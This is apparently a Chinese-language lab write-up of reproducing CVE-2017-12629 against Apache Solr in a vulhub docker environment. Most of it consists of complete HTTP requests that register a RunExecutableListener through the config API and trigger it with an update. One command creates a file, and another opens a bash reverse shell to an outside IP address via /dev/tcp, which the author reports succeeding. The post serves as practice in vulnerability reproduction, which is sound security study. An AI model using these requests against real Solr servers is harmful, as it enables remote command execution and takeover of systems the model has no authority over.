学习ApachesolrXML实体注入漏洞(CVE-2017-12629)

信息安全不简单鸭 2024-08-04 20:36:31

这个实验分2个阶段,第一阶段是通过XML 实体注入写一个文件,第二阶段是通过XML 实体注入反弹shell。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。[1]

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明Apache solr XML 实体注入漏洞(CVE-2017-12629)环境搭建成功了

首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:

POST /solr/demo/config HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: closeContent-Length: 158{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

然后进行update操作,触发刚才添加的listener:

POST /solr/demo/update HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Content-Type: application/jsonContent-Length: 15Connection: close[{"id":"test"}]

进入docker里面,查看创建文件成功

咱们来反弹shell

POST /solr/demo/config HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: closeContent-Length: 185{"add-listener":{"event":"postCommit","name":"newlistener3","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/174.137.58.6/8888 0>&1"]}}

POST /solr/demo/update HTTP/1.1Host: 144.34.162.13:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Content-Type: application/jsonContent-Length: 15Connection: close[{"id":"test"}]

PWN 反弹shell 成功了

参考^Apache Solr 远程命令执行漏洞(CVE-2017-12629) https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
0 阅读:12

信息安全不简单鸭

简介:感谢大家的关注